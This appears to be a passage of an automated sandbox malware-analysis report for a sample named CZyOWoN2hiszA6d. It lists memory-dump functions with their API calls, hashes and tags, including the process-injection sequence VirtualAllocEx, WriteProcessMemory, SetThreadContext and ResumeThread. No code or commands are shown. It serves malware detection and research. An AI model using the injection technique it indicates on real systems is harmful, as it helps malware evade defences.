Instruction Fuzzy Hash: F4111C71D056198FEB68DF67C9046EEFEFBAFC9340F14C079941966254DB340946CA90

Function 06F8E2E4 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8E526

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d76553d7792c1d15a2c9a9b83161832fd89d5e551459e7b2e6d8eba17da0fd70
Instruction ID: a4285cd1d1329a753040a841d6323cb5c81da23a696843c6917a513fd7842656
Opcode Fuzzy Hash: d76553d7792c1d15a2c9a9b83161832fd89d5e551459e7b2e6d8eba17da0fd70
Instruction Fuzzy Hash: AFA17CB1D00219CFEF64DFA8C8417EDBBB2BF48314F1485AAD809A7290DB749985CF91

Function 06F8E2F0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8E526

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 20e3a1f993cc8ba13ed91e1d687bf911220ddde2da58138ae6c5b500e18da354
Instruction ID: 26c5cec18336a19ac44bd19681991a3a649e94dda0a5dd41beee7a453d22ab09
Opcode Fuzzy Hash: 20e3a1f993cc8ba13ed91e1d687bf911220ddde2da58138ae6c5b500e18da354
Instruction Fuzzy Hash: 78916CB1D00219CFEF64DFA8C8417EDBBB2BF48314F1485AAD819A7290DB749985CF91

Function 0288B6D7 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0288B93E

Memory Dump Source

Source File: 00000000.00000002.2045152983.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2880000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9eb6651075a3e2da2dcfc5b86ddb77fff5bfa1062862a4f2252e24758fc21198
Instruction ID: 47d65401ceeaceca45f1769397685d9b8d2f66de54a7e9d892ad69ff484f2ace
Opcode Fuzzy Hash: 9eb6651075a3e2da2dcfc5b86ddb77fff5bfa1062862a4f2252e24758fc21198
Instruction Fuzzy Hash: 4D813478A00B458FD724EF69D54075ABBF2FF88308F04892DD49AD7A50DB39E846CB91

Function 04FE21C4 Relevance: 1.6, APIs: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04FE22E2

Memory Dump Source

Source File: 00000000.00000002.2052087516.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6cd4a1267c2dc9762c0dfd32b815016a808fbc7237254b42729d8de17a452acf
Instruction ID: 026c800025885a9036b46fc2c842d3e0c6d9aa76562e56675d2a276a16c5e3fa
Opcode Fuzzy Hash: 6cd4a1267c2dc9762c0dfd32b815016a808fbc7237254b42729d8de17a452acf
Instruction Fuzzy Hash: E451D4B5D003099FDB14CFAAC884ADDBBF5FF48300F25852AE818AB210D775A846CF91

Function 04FE15E0 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04FE22E2

Memory Dump Source

Source File: 00000000.00000002.2052087516.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d35db0526196f4f895f6e5c3ad7ec4ce969305c662ff8290b5a76f44b1c037ca
Instruction ID: 72b5e6f65b13a7683cd2062b4a6f94ba01ed38456c0bb6047494a19f3e31fc9a
Opcode Fuzzy Hash: d35db0526196f4f895f6e5c3ad7ec4ce969305c662ff8290b5a76f44b1c037ca
Instruction Fuzzy Hash: E251B2B1D003099FDB14CF9AC884ADEBBF5FF48314F25856AE819AB210D775A845CF91

Function 0288590D Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028859C9

Memory Dump Source

Source File: 00000000.00000002.2045152983.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2880000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ca4657dcab0e8e690c381c6c16265dbec1a214d333877a13cc1675acafcf8ecf
Instruction ID: 8f865553dc8adaac3aa07b2194657e1d21226d3931d44fcce7838a0b73b9784d
Opcode Fuzzy Hash: ca4657dcab0e8e690c381c6c16265dbec1a214d333877a13cc1675acafcf8ecf
Instruction Fuzzy Hash: 0E41F2B4C00619CBDB24DFA9C884BCDBBF1BF49304F60816AD419AB254DB75694ACF91

Function 04FE1734 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04FE4861

Memory Dump Source

Source File: 00000000.00000002.2052087516.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b9f072e6cb263eedba101c3207308711187628e2078f1c0a16145b3e802a3613
Instruction ID: 94d1d13f9c9de9523d22eaa67dc32e2cfb30311c76764d8c0e41337e839ba573
Opcode Fuzzy Hash: b9f072e6cb263eedba101c3207308711187628e2078f1c0a16145b3e802a3613
Instruction Fuzzy Hash: BB4129B5A00345DFDB14CF9AC488AAABBF5FF88315F24C459D519AB321D374A942CFA0

Function 028844E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028859C9

Memory Dump Source

Source File: 00000000.00000002.2045152983.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2880000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d57c7744157f996fe7efb676e4a2550755b99451820fb1ae269d979a07fb6eaa
Instruction ID: 72b34f3c0d93421dc200fb29440ced495c373ba8ee5cc5a64dee995c33bc3dee
Opcode Fuzzy Hash: d57c7744157f996fe7efb676e4a2550755b99451820fb1ae269d979a07fb6eaa
Instruction Fuzzy Hash: B941E4B4C0071DCBDB24DFA9C884B9DBBF5BF48304F60806AD419AB265DB75694ACF90

Function 02885A84 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2045152983.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2880000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53f6dbdc045b2657352eff2281430caa2b893cf36c93ef5eaad29a571a67eda2
Instruction ID: 1c4d7d99831b7965a39851a2a343550b9ed1f290c1e5863d2daa7c0e9a925840
Opcode Fuzzy Hash: 53f6dbdc045b2657352eff2281430caa2b893cf36c93ef5eaad29a571a67eda2
Instruction Fuzzy Hash: 7631DCB8804248CFDB15EFA8C8947ADBBF1EF06308F90414AC015AB265C779A94BCB11

Function 06F8DC60 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F8DCF8

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a6adde74e74f975c41875a6c1b525353035d9fa1983025eb7906026c24b03979
Instruction ID: 9102e9b99b5a8f1888b148c288a33fd7fa4f38ba2a6d127de3b7ac3091c7753d
Opcode Fuzzy Hash: a6adde74e74f975c41875a6c1b525353035d9fa1983025eb7906026c24b03979
Instruction Fuzzy Hash: C62123B5D003498FCB10DFA9C984BEEBBF5FF48310F10842AE919A7250D7789945CBA0

Function 06F8DC68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F8DCF8

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a63762b69ec8578704f36c787d63b1d3bca2788794ed70bb7d329500bccc3b67
Instruction ID: c9bf33de86d5a70fc00973515252a3a0b1e0c97e1b321c6fcfb6817775217354
Opcode Fuzzy Hash: a63762b69ec8578704f36c787d63b1d3bca2788794ed70bb7d329500bccc3b67
Instruction Fuzzy Hash: 472127B5D003499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7250C7789944CBA0

Function 0288D738 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0288DB8E,?,?,?,?,?), ref: 0288DC4F

Memory Dump Source

Source File: 00000000.00000002.2045152983.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2880000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 78971b15cc76ece9e3622892ecd6f4adcb883c19ef05e99de60a5f81f0628b0d
Instruction ID: bb9c33369668e7d1bb0f764c337feaa95971baa3fbd5c884ae6404a5e50f8800
Opcode Fuzzy Hash: 78971b15cc76ece9e3622892ecd6f4adcb883c19ef05e99de60a5f81f0628b0d
Instruction Fuzzy Hash: 7921E6B59002089FDB10DFAAD584ADEBFF5FB48314F14841AE918A7350D378A944CFA5

Function 06F8D698 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8D716

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 48c41567d5267297aec199d9d0056f6c3928a8e95d38ac469f5f589adf951584
Instruction ID: f33ebfca2d5094e3342efcbb78ee1e8a2f4c415d81485e7a2f61836f34c46556
Opcode Fuzzy Hash: 48c41567d5267297aec199d9d0056f6c3928a8e95d38ac469f5f589adf951584
Instruction Fuzzy Hash: A32115B1D002098FDB10DFAAC4857EEBBF5FF49324F14842AD519A7240CB78A985CFA5

Function 06F8D690 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8D716

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 321c3c440946269655d5e5d3c4a50c251bdfb4219d1668742ef359d568e4cbd3
Instruction ID: 28d2dcf9f4a3923b796bfcdc425b786fcd13a4093de855c364b92ce222cb53d1
Opcode Fuzzy Hash: 321c3c440946269655d5e5d3c4a50c251bdfb4219d1668742ef359d568e4cbd3
Instruction Fuzzy Hash: 502135B1D002498FDB10DFAAC5847EEBBF5FF49314F14842AD459A7280CB789984CFA1

Function 06F8DD58 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F8DDD8

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: aa266c7dffd1abe8972b34af5a6c2c083f7d14209276370aab1495546ee1cfda
Instruction ID: 8c94351ec6629763be6b41a1df787909dc73beaf7d33f3bab59553c20a484906
Opcode Fuzzy Hash: aa266c7dffd1abe8972b34af5a6c2c083f7d14209276370aab1495546ee1cfda
Instruction Fuzzy Hash: F521F8B1C002499FCB10DFAAC845AEEFBF5FF48310F50842AE519A7250C779A545CFA5

Function 06F8DD51 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F8DDD8

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 53b3a79af6c1ccabd7f5fee9ad69ed7b334688b53407ac1296f9e8d9fe6baec6
Instruction ID: c7a0be49564ba5d3529fe5a212ce12c55fe404ee2f2aebb3534ecd054dfada65
Opcode Fuzzy Hash: 53b3a79af6c1ccabd7f5fee9ad69ed7b334688b53407ac1296f9e8d9fe6baec6
Instruction Fuzzy Hash: 952109B1C002499FCB10DFAAD944AEEFBF5FF48314F14842AE519A7250C7789545DFA4

Function 0288B3E0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0288B9B9,00000800,00000000,00000000), ref: 0288BBCA

Memory Dump Source

Source File: 00000000.00000002.2045152983.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2880000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 99cb2ed10509eda03d9a87e761476b21ce8ef6d952c22e99593beca0d6d04fb0
Instruction ID: 60f41c5da0b62abb27457d5c85feec3957cbea7ce60873217374e342b4d2bd9d
Opcode Fuzzy Hash: 99cb2ed10509eda03d9a87e761476b21ce8ef6d952c22e99593beca0d6d04fb0
Instruction Fuzzy Hash: BE1114BAD002099FDB10DF9AC444A9EFBF5EB88314F10842AD919A7210C379A945CFA4

Function 06F8DBA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F8DC16

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6f39bf17e324b46b1296d7e7e5330d222e079945bb4fb2e8d577856d135746c4
Instruction ID: e9baa26f74c78e547557d6ef60427cd00882dbf19e67d928e67ec164af571d27
Opcode Fuzzy Hash: 6f39bf17e324b46b1296d7e7e5330d222e079945bb4fb2e8d577856d135746c4
Instruction Fuzzy Hash: 6D1126718002499FCB10DFAAC844AEEBFF5FF49320F208819E519A7250C779A544CFA0

Function 06F8DBA1 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F8DC16

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 73ee72eba0e458d5cc035133658d938d1656a56ab50227c9b0394f91b17f292f
Instruction ID: 874f942a02e7eaee3262e9823d55b5691454d020210be011921286bb248b8df0
Opcode Fuzzy Hash: 73ee72eba0e458d5cc035133658d938d1656a56ab50227c9b0394f91b17f292f
Instruction Fuzzy Hash: C7112975D002499FCB10DFA9C9446EEBFF5FF48314F148419D519A7250C7799544CFA0

Function 0288BB58 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0288B9B9,00000800,00000000,00000000), ref: 0288BBCA

Memory Dump Source

Source File: 00000000.00000002.2045152983.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2880000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 159cf995bdac3a35b01738e21da9a7552c07da905ed24eb70efd4e17448abbb1
Instruction ID: da6f84f4184466add37c21968586020ef4cfaef620d964c8682316053e6a7401
Opcode Fuzzy Hash: 159cf995bdac3a35b01738e21da9a7552c07da905ed24eb70efd4e17448abbb1
Instruction Fuzzy Hash: 2F11E2BAD002098FDB14CF9AD544A9EFBF5FB88314F14842AD519A7210C3B9A945CFA5

Function 06F8D1A8 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F8D212

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9ed85556893d1b2b2b2da8e37d7e162913016f5fec25c2c274a654453e477806
Instruction ID: 6c2daf901bf986527aad13b7315a0260ef7b01cdda41bab507f36bc8d0682e9a
Opcode Fuzzy Hash: 9ed85556893d1b2b2b2da8e37d7e162913016f5fec25c2c274a654453e477806
Instruction Fuzzy Hash: 551146B5D002488ECB20DFAAC4447EEFBF5AF88314F24841AD419A7240C778A544CBA0

Function 06F8D1B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F8D212

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1678f1ceb1799426ac627dae40a38afe4839236bdf4b15abbaf39047bc688501
Instruction ID: e9055ec6320bd121a55b64517468e16b830b4193dc926b5d0408657f0ac46a33
Opcode Fuzzy Hash: 1678f1ceb1799426ac627dae40a38afe4839236bdf4b15abbaf39047bc688501
Instruction Fuzzy Hash: FA113AB1D002488FCB10DFAAC4457EEFBF5EF88324F208419D519A7240CB79A544CFA4

Function 0288B8D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0288B93E

Memory Dump Source

Source File: 00000000.00000002.2045152983.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2880000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: aed871c702e0931f07c1fce8f2a308818ce7a27a936c8e2f82ef4c1ed3eaf16e
Instruction ID: d4e2cb38442521f346b6c566d3e5241d6cdf9f16dbe7fb89eef1b41e866dfb15
Opcode Fuzzy Hash: aed871c702e0931f07c1fce8f2a308818ce7a27a936c8e2f82ef4c1ed3eaf16e
Instruction Fuzzy Hash: E81113B9C002498FCB10DF9AC844ADEFBF5FF88328F10846AD518A7210D379A545CFA1

Function 011CD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044798262.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11cd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 395038858c10a8fefbed137d762fa2ccbe20aabfff07b4343fe2dc02867ca636
Instruction ID: f4398b35a2bf7ef0ed6471e2ffe5c74ac41134bc7d4efb9f256a728c30725d4f
Opcode Fuzzy Hash: 395038858c10a8fefbed137d762fa2ccbe20aabfff07b4343fe2dc02867ca636
Instruction Fuzzy Hash: 9D2102B1100204DFDF09DF58E9C0B66BF65FBA8714F20C17DDA090A656C33AE406C6E2

Function 011CD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044798262.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11cd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c682381b428f05191c6ed94f6878215238f7d7c7b3306b562d8e5a26714ff3d0
Instruction ID: 3d8e68ddfd10205cbb7d5612da47636204fa614bc96549997c095d1a3c7e1749
Opcode Fuzzy Hash: c682381b428f05191c6ed94f6878215238f7d7c7b3306b562d8e5a26714ff3d0
Instruction Fuzzy Hash: 4721E071500240DFDF09DF98E980B26BF65FBA8718F20857DE9090A256C33AD416CAE2

Function 011DD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044862546.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11dd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5460ebf116109e13c0cbc5b0d310a434c50d8345fde043156d68a2e4da636501
Instruction ID: 80fb3d64eec20b38956f3eaa105501d71da903b974192f08b685cf429ae0159d
Opcode Fuzzy Hash: 5460ebf116109e13c0cbc5b0d310a434c50d8345fde043156d68a2e4da636501
Instruction Fuzzy Hash: 4921F271604204DFDF19DF68E984B26BF65FBC8354F24C56DD90A4B296C33AD407CAA2

Function 011DD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044862546.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11dd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 744916b34125f87588b6035d00ae888af3c7285f2f7b93544f1a86abd0bee9ee
Instruction ID: b59d1efbdcc4e487caf784dc92376b9ebd627433f3d6bc5f160b75d6bdd3c29b
Opcode Fuzzy Hash: 744916b34125f87588b6035d00ae888af3c7285f2f7b93544f1a86abd0bee9ee
Instruction Fuzzy Hash: 1121D771544204EFDF09DFA8E9C0F26BF65FB84324F24C56DE9494B296C33AD446CA62

Function 011DD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044862546.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11dd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3564bd54dc7e41f34523aef8253bd213474e163ab3c7660a87fb06100f82ae1
Instruction ID: a93b39dcfc62cbdd1f13b35ddec322aab985b5e8f387b31ebf3814410005a977
Opcode Fuzzy Hash: a3564bd54dc7e41f34523aef8253bd213474e163ab3c7660a87fb06100f82ae1
Instruction Fuzzy Hash: 4D21A1755093808FDB17CF24D994B15BF71EB86214F28C5EAD8498B6A7C33AD40ACB62

Function 011CD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044798262.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11cd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 8e31b088c14b66bb675da1a29ea5540dd088482c7b5b5f0a9c7894d648f93670
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: BC11CD72404280DFDF06CF44D9C4B56BF61FB94224F24C6ADDA090A656C33AE45ACBA2

Function 011CD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044798262.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11cd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 5f7358f9821de03d1d006202401b064cb9cae840db22e487c15a223ef9ce6c6a
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: CE11CD76404280CFCF06CF54E9C4B16BF71FBA8614F24C6A9D9490B256C336D45ACBA2

Function 011DD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044862546.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11dd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: f8668bc3675b7cd7abe3d5776c26f50fa6a7ab07a422a886a53b6b9682c51410
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 9E11BB75504280DFDF06CF54D5C4B15BFB1FB84224F24C6A9D8494B696C33AD40ACB62

Function 011CD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044798262.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11cd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5020da449b0a9cc0e8e0c3a17379504570f30a65c22c9509952be919f8dc115b
Instruction ID: 6be9cde30ce68006aedb3314dd79680ed1e3b4d8e9f468fb1c04b3e3706eb8aa
Opcode Fuzzy Hash: 5020da449b0a9cc0e8e0c3a17379504570f30a65c22c9509952be919f8dc115b
Instruction Fuzzy Hash: 3801203100478099EB144BA9DC84B67FFDCEF55B24F18C43EED090A246C3799840C6F2

Function 011CD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044798262.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false

Joe Sandbox IDA Plugin

